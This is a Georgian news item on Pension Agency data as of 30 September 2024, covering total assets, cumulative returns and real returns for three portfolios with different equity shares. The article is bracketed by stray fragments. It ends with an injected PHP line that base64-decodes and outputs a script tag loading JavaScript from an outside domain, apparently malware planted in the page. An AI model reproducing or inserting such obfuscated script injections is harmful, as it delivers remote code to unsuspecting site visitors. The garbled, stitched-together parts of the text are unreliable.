celsiusi
ავერსი შნაიდერი

 საპენსიო სააგენტოს მონაცემებით, 2024 წლის 30 სექტემბრის მდგომარეობით, საპენსიო აქტივების მოცულობამ 5.7 მილიარდ ლარს გადააჭარბა, ხოლო ჯამურმა ამონაგებმა 1.3 მილიარდ ლარს მიაღწია.

როგორც სააგენტოში აღნიშნავენ, 2024 წლის სექტემბერში ერთ წელზე მეტი გავიდა 3 პორტფელის გაშვებიდან. ამ პერიოდში აკუმულირებული ამონაგებით, როგორც ნომინალურ ისე რეალურ რიცხვებში დინამიკური პორტფელი ლიდერობს.

კერძოდ, 2023 წლის 6 აგვისტოდან 2024 წლის 30 სექტემბრის ჩათვლით პერიოდში დინამიკური პორტფელის რეალურმა ამონაგებმა 16.98% შეადგინა, იმავე პერიოდში დაბალანსებული და კონსერვატიული პორტფელების რეალური ამონაგები შესაბამისად 15.12% და 12.64% იყო.

აღნიშნულ პორტფელებს შორის მთავარი სხვაობა გლობალური აქციების პროპორციაა. სექტემბრის ბოლოს მდგომარეობით, დინამიკურ პორტფელში აქციების წილი 53%, დაბალანსებულში 32%, ხოლო კონსერვატიულში 18% იყო.

123
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");